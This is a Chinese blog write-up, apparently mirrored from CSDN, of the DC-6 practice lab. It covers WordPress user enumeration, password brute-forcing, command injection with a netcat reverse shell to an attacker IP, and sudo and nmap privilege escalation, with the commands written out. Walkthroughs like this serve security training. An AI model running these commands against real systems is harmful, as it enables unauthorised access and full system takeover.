码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • DC-6 靶机


    DC_6

    信息搜集

    存活检测

    在这里插入图片描述

    详细扫描

    image-20231023165338741

    需要添加 DNS 解析

    vim /etc/hosts
    
    • 1

    image-20231023165450298

    后台网页扫描

    dirsearch -u http://10.4.7.150
    
    • 1

    image-20231023165740307

    网页信息搜集

    • 使用 wappalyzer 插件识别 cms 指纹,发现为熟悉的 WordPress

      image-20231023172017074

    • 并且发现了网站的登陆页面

      image-20231023172452558

    • 直接上 wpscan

      扫描用户

      wpscan --url http://wordy --enumerate u 
      
      • 1

      扫描出如下用户,将用户写入 users 文件中以供爆破

      image-20231023174329291

    • 尝试 cewl 生成密码字典

      image-20231023174804359

    • 爆破

      image-20231023175229931

    • 爆破失败

      image-20231023175257084

    • rockyou 字典爆破

      image-20231023212103641

      dc6 官网上提示过滤一些密码可以提升爆破速度

      cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
      
      • 1
      wpscan --url http://wordy --passwords passwords.txt --usernames users
      
      • 1

      image-20231023212303251

    • 成功爆破

      用户名 mark

      密码 helpdesk01

      image-20231023213537470

    • 登录网页

      image-20231023213733116

    Webshell

    • 搜索框内尝试命令注入

      image-20231023214759279

    • kali 开启 nc 监听

      image-20231023214840083

    • 输入连接反弹 shell 的命令

      10.1.1.1|nc -e /bin/bash 10.4.7.146 7777
      
      • 1

      有长度限制

      image-20231023215002694

    • 修改源码中允许的最大长度

      输入反弹命令,点击 Lookup 连接

      image-20231023215429620

    • 成功反弹

      image-20231023215447981

    ssh登录

    • 反弹成功后搜集系统中有用信息

      在 /hoomr/mark/stuff 下发现了包含 graham 密码的文件

      密码为 GSo7isUM1D4

      image-20231023220034640

      尝试 ssh 登录

    • 成功登录

      image-20231023220149331

    提权

    • sudo -l 查看权限

      image-20231023220219626

    • 发现 jens 可以无需密码以 root 权限运行 /home/jens/backups.sh

    • 查看 backup.sh 文件

      image-20231023220904917

      发现是一个压缩命令

    • 查看文件权限

      image-20231023220931296

      所属组拥有全部权限

    • 查看 graham 信息

      image-20231023221450772

      发现与 jens 同属一个组,拥有对文件的修改权限

    • 向文件中写入提权命令

      echo bash >> backups.sh
      
      • 1

      image-20231023221548032

    • sudo 执行

      sudo -u jens /home/jens/backups.sh
      
      • 1

      image-20231023222159317

    • 切换到 jens 用户

      image-20231023222240231

    • sudo -l 查看 root 权限

      image-20231023222319457

    • nmap 提权

      TF=$(mktemp)
      echo 'os.execute("/bin/sh")' > $TF
      sudo nmap --script=$TF
      
      • 1
      • 2
      • 3

      image-20231023223242815

    • 提权成功

      image-20231023223314391

    总结

    • 命令注入,绕过
    • wpscan 用户扫描,密码爆破
    • nmap 提权
  • 相关阅读:
    27岁自学Python转行靠谱吗?入行晚吗?
    CloudKit提示Permission Failure:Invalid bundle ID for container 错误的超详细解决
    通俗易懂,一文学会前端缓存
    我修复了一个 Vite Bug,让我的项目首屏性能提高了 25%
    leetcode-627. 变更性别
    Python网页应用开发神器fac 0.2.10版本新功能介绍
    oracle查询相同条件重复值只取第1条
    Spring Security 动态权限实现方案
    Python Tensorflow1.x升级到2.x低阶API实践
    9、【办公自动化】Python实现Word文件的批量操作
  • 原文地址:https://blog.csdn.net/weixin_51559599/article/details/134000840
  • 最新文章
  • 【JVM】编译执行与解释执行的区别是什么?JVM 使用哪种方式?
    用 Hashids 优雅解决 C 端自增 ID 暴露问题
    V8引擎 精品漫游指南--Ignition篇(上) 指令 栈帧 槽位 调用约定 内存布局 基础内容
    LLVM Pass快速入门(四):代码插桩
    milkup:桌面端 markdown AI续写和即时渲染
    基于项目工程构建SBOM(软件物料清单)的研究
    鸿蒙应用开发UI基础第二节:鸿蒙应用程序框架核心解析与实操
    .NET 中如何快速实现 List 集合去重?
    扣子Coze实战:从0到1打造抖音+小红书热点监控智能体
    浅谈数据访问层
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号